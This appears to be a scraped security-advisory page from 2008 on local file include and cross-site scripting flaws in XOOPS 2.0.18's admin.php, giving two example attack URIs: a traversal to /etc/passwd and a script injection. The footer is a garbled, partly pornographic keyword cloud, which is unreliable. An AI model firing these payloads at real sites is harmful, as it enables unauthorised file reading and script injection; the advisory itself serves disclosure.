about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , XOOPS Local File Include and Cross Site Scripting Vulnerabilities


Title XOOPS Local File Include and Cross Site Scripting Vulnerabilities
Published 2008-07-21-12:00AM
Updated 2008-07-22-09:28PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Ciph3r
Vulnerable  Xoops Xoops 2.0.18 1
Not Vulnerable  
Code  Attackers can exploit this issue via a browser.The following example URIs are available:For the local file-include issue:http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00For the cross-site scripting issue:http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:33:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
g.gogosale 1983 Download T www.bjdabx vidio porn myanmar se administra Hot stills www.dvdfox 125.45.109 Pakistan components yijianlou. get admin ayeshataki www.0000wm 200 /compo news for C kamar mand 12.3 shmat www.2wmsf. linux 2.6. wW.Xxx.G ayeshataki Crack Data 12.2(25) S u s xxx se www.299sf. www.0755dr Exploits S Tamil fam xandros Horses hav olldar sex Www.sex xx Trisha nud nude ayesh http:/www. SXEY ASS 1.3.37 Madhurisex www.18 com news for c www.cnad56 ucla www.jncyzc www.bjmoon 200 /compo 1.3.31